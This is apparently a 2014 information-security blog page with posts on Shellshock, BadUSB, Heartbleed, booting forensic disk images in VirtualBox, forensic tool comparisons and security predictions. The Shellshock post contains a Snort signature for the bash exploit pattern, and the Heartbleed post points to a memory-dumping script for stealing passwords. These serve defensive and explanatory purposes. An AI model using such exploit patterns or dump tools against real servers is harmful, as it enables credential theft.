Wednesday, November 12, 2014

Not only that.We all are better together

Just read an article published by Darkreading "Better Together: Why Cyber Security Vendors Are Teaming Up".

I always believe that one cannot fight cybercrime alone.

Cybercrimes are organized crime. We all know that there are organized crimes have gone "cyber" for quite some times. They evolve. We must too.

If those bad guys can team up to launch a cyber attack. The vendors are teaming up too, then why can't we - Cyber security representatives of our company - team up to defense ourselves? Start by sharing info, intel and  experiences in mitigating attacks.

If some of us are worried about  disclosing "weaknesses" to competitors, then start with a closed group, for example, amongst "Top 10 public listed companies" in XXX country. Of course it could be that at first few initial meetings, no one would really share a very detailed info but over the time when trust has been built amongst the members, more info and details would flow in.

Most of us security folks are trained to be skeptical and careful in trusting people, but in the matter of countering cybercrimes, I don't think we have much choice there. We have to learn to trust, give and take.

Sunday, September 28, 2014

Bashing the Big Bad Bash "shellshock"

Updated: 29/9/2014:  Updated video from SANS

How bad is it? Very.

What happened? Check out the SANS's video below:

As of today (28 Sep 2014), current patch is not adequate as it only fixed the first problem (CVE-2014-6271) but not the 2nd one (CVE-2014-7169). Vendors are still struggling to fix  , the second problems (CVE-2014-7169 and 4 other new bugs discovered.

Also, the folks at Fireye have written a very good piece about this with sample of attack vectors and exploits included.  Check out their blog post titled "Shellshock in the wild" 

Now, I'm sure by now you have been asked the one million dollar question by your boss or some senior managers:
Are we vulnerable? Can you quickly find out?
Quick is the keyword. You should first check your exposure from the internet.

But how? Ask google. Look for indication of usage of bash script on your website. For example:

filetype:sh OR filetype:bash

If you see URLs with sh or bash extension, be paranoid. Check those first and disable them. Replace the script with something else e.g. Perl or Python.

Next, you may want to add a custom signature to your NIPS to detect/stop any potential exploits. Here is a quick snort signature signature (taken from Volecity's website)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:”Volex – Possible CVE-2014-6271 bash Vulnerability Requested (header) “; flow:established,to_server; content:”() {“; http_header;  threshold:type limit, track by_src, count 1, seconds 120; sid:2014092401;)

Or grab the official snort rules from snort's website here

Information security folks: If you play this game well, it could be another good business case for you to push for those legacy systems to be updated/upgraded!

Friday, August 8, 2014

Babusb in enterprise. Why you should not panic over it.

Hot topics of this past 2-3 weeks - Badusb. Until yesterday, most talks or write-ups are just speculations as there are no details released.

Folks at had released more details during their Black Hat 2014 presentation yesterday. You may grab the slides on their website here

As the CISO or Information Security Professional responsible for ensuring security within your organisation, you have every right to be worried. The good news is,  you can stop the panic mode now, if....

You don't allow admin right to your users. 
To successful attack a target machine, the attacker must have/gain access to a machine that has been logged in by a user that has admin privilege.

I find that WIBU Systems's alert explain it very well. Here are the excerpt:

"A BadUSB attack can be successfully accomplished only with logged-in users who have administrator privileges to their computer. In principle, the attack would also work for OS X and Linux; only the actual commands from the “keyboard” would be different."

Nowadays, most enterprise laptops/pcs are hardened and you rarely see users with admin right anymore. Of course, there are exceptions (really? If you are the CISO, shame on you!).

Of course, there are still risks. But I will say, the risk is low - if you have done the right things. 

Friday, June 27, 2014

Booting up evidence E01 image using free tools (FTK Imager & Virtualbox)

Being able to boot an acquired evidence image (hard drive) is always helpful for forensic and investigation. If you would do a Google search, you would find most methods or discussions are referring to usage of Vmware Workstation. As Vmware Workstation is not free, not a good news if you are on low budget or do not have one at all.

Don't worry....I will show you how you could boot an acquired E01 image using freely available tools.

What you will need:
1. FTP Imager 
2. Virtualbox and Virtualbox expansion pack-
3. Admin right (do not have one? You're joking right???)

I'm not going to detail down how you should install FTK and Virtualbox.... those are really easy.

Here are the steps:
1. Open FTK Imager. Go to File -> Image Mounting.

2. Select the E01 image you want to mount.
a) Mount Type: Physical Only
b) Mount Method: Block Device / Writeable (I know what you are thinking.... do not worry about tampering the evidence file. FTK Imager will create a cache file that will temporarily store all the "changes" you made)
c) Write Cache Folder: Take the default or point it to any folder that would make you happy :)

3. Click "Mount". You will see which physical drive the image is mapped to.

4. Create a new folder (for storing the virtual disk file later) e.g. c:\temp\
5. Open a command prompt as administrator. Go to c:\Program Files\Oracle\VirtualBox. Run following command: vboxmanage internalcommands createrawvmdk -filename c:\temp\\securityisfun.vmdk -rawdisk \\.\physicaldrive5

NOTE: Replace the path, file name to be created and physical drive as accordingly.

5. Run Virtualbox as administrator. Create a new virtual machine matching the OS of the image e.g. Windows XP or Windows 7.
a) RAM - set it to any amount you like. For me, normally I will set it to 2GB
b) Hard Drive - point it to the virtual disk file you just created in step 5 above

6. Well, start the virtual machine. It should run now. 

7. In case you get a blue screen.. which is not uncommon. Try changing the HDD controller type, which is IDE by default, to SATA, SCSI or SAS. You can change this by editing the settings of the virtual machine:
a) Delete the existing HDD controller
b) Add a new controller e.g. SATA
c) Add a new disk. Select "Choose an exiting disk". Point it to the virtual disk file you created (e.g. securityisfun.vmdk)

8. If you still get the blue screen... this might be due to Windows could not see the drive. Try following steps which involve editing the registry to enable SCSI and SAS drivers on boot:  
a) Unmount the image you mounted with FTK Imager
b) Mount the same image with FTK Imager but now with the option: 
Mount Type: Physical & Logical
Drive Letter: Take the default
Mount Method: Block Device / Writable
c) You should see the partitions of the image are now mounted and accessible


d) Run "regedit.exe" as administrator.
d) Expand "HKEY_Local_Machine". 
e) Select "Load Hive". Point it to the SYSTEM hive of the Windows partition of your mounted image. For example, if the image's Windows partition is mounted by FTK as K:, point it to K:\Windows\system32\config\SYSTEM

d) Enter any name when prompted e.g. (sorry, a bit of marketing here :) ). You should now see additional registry key with the name you typed appeared.

e)  Navigate to\ControlSet001\Services

 f) Look for "LSI_SCSI". Click on it and set the key "Start" value to "0" (zero). Setting it to "0" means Windows will start/load this driver at boot time. Repeat the same for "LSI_SAS, LSI_SAS2". 

g) Point to the "" hive once you finish editing. Select "File, Unload Hive". Click "Yes". Close regedit.
h) Now try to boot your virtual machine again. Try using difference controllers e.g. SAS, SATA, SCSI if you still getting the blue screen.

9) If you are still getting the blue screen despite doing all this........ two words for you - bad luck! At this moment, I don't have any other solutions or workarounds. I will update this blog post if I (ever) come across something new :) 

Have fun!

Tuesday, June 3, 2014

HiTB Haxpo AMS 2014 - My takeaway

Yup. That's my crew T-shirt of Hack in the Box Amsterdam 2014 or now known as Haxpo. It was nice and fun meeting all the .MY and .NL folks again.

I have to admit, I feel like the presented conference topics are not as exciting as last year's.  However, the Haxpo (the part where you can enter for free) was quite a success.

Nevertheless, there are couple of interesting topics that caught my attention:

1.  Cool idea - splitting java exploits into multiple "innocent" looks Java applets in order to avoid detection. Check out Reloading Java Exploits: Long Live Old JRE! by renown security researcher (read Hacker) LUIGI AURIEMMA .

2. Wanna fly for free? Check-out Exploiting Passbook to Fly for Free by ANTHONY HARITON. This was the most funny presentation that I had seen this year. Full of fun and laughs. NOTE: He did not confirm nor deny whether he did indeed perform the "test: personally :)

See y'all again next year folks!

Friday, April 11, 2014

Heartbleed - A picture that tell a thousand words

20140414 Update #2
The server's private key can be obtained. This is confirmed. See here.

Update #1:
Apparently NSA KNEW about this since years ago. Surprised? Not really...

Well explained. Picture taken from xkcd -

How bad is heartbleed? Very bad. It affects not only https. But all other applications, servers , routers, firewalls that use OpenSSL.

We have heard all the bad news. But, there is a little good news. Retrieving private keys may not be that easy. This post explains it all. However, getting passwords are still easy if you are lucky (well, try a few times). There are a few websites that you can use to check if a website is vulnerable, but done give you the dumps. Here is the python script that give you the dump.
Tips: run it in debug mode.

Thursday, February 20, 2014

Encase vs Autopsy vs XWays

Over the past few months, I have had the chance to work more extensively with the following IT Forensic tools (at the same time):

1. Encase Examiner
2. XWF or X-Ways
3. Autopsy

Most IT forensic professionals would say that there is no single tool that fit for everything. I can't agree more.

Here are my personal views of each tool's pros and cons:

1. Encase:

- Easy to use user interface.
- Renown tool and accepted by court of laws.
- Easy reporting features.
- Easy and free tool for acquisition (Encase Imager).
- Built-in support for Bitlocker.
- Nice and user friendly "Review Package" that can be sent to Requestor for reviewing the evidence.

- Not cheap.
- Evidence processing can be slow, especially when processing large PST files.
- Not portable by default.

2. XWF (X-Ways)
- Very customizable evidence processing options. Thus, you can select to process only certain things that you want to look at e.g. emails, registry.
- Very flexible and granular filtering options. Filter by column 1 + filter in colum 2 etc...
- Highly customizable search functions. For example, search for "xyz" only in Word documents.
- Multiple instances e.g. one doing "processing", the other doing live preview.
- Portable by default.
- Very frequent updates for new features. 

- Complex interface. Technical in nature - not easy to learn for a beginner.
- Too many options to choose, thus could be confusing. (However, the default options are good enough for most of the cases).
- Dongle must be attached all the times to start the software.
- No option to create nice "Review Package" that you can forward to someone.
- No support for Bitlocker (the company I work for use this a lot).
- No nice "review package".

3. Autopsy:
- Free for commercial use.
- Very fast and easy tool for analysis of user's browsing history or internet activities.

- Limited function (but it is free!).
- No support for Bitlocker.
- No nice "review package".

Thus, it really depends on what you want to do. For example, if I would like to quickly find out how a malware infected a machine, I would use Autopsy first. If I would like to process evidence for fraud cases, I would go for Encase first. X-Ways will be the tool if I need to do complex filtering and fast extraction of some evidence.

Have fun!

Saturday, January 18, 2014

What's coming in 2014?

What's coming to information security world in 2014?

These are my views:
1. Malware will be for profit. No longer about fun.It will be harder to track who is behind it.
2. Cryptolockers or alike will go mainstream.
4. Demand for digital/IT forensic will go up.
5. More providers will enhance their services offering with encryption to respond to NSA's spying activities.
6. Companies and government organisations will collaborate more to fight cybercrimes. More join announcements will be made on successful take-downs of botnet or cybercrime networks.
7. Windows XP end of live will have a high impact and will directly contribute to higher botnet activities. The bad guys are holding their cards now, waiting for the right time to swallow their preys once XP is left orphaned.
8. More malware will target Android devices. I won't be surprised if Cryptolocker invades Android soon (if it does not already did that).
9. Data breaches will continue to rise. We will see more data breaches of big retail or non IT services companies.
10. Big Data will be one of the hot topics discussed.  

What's yours?

Picture's source -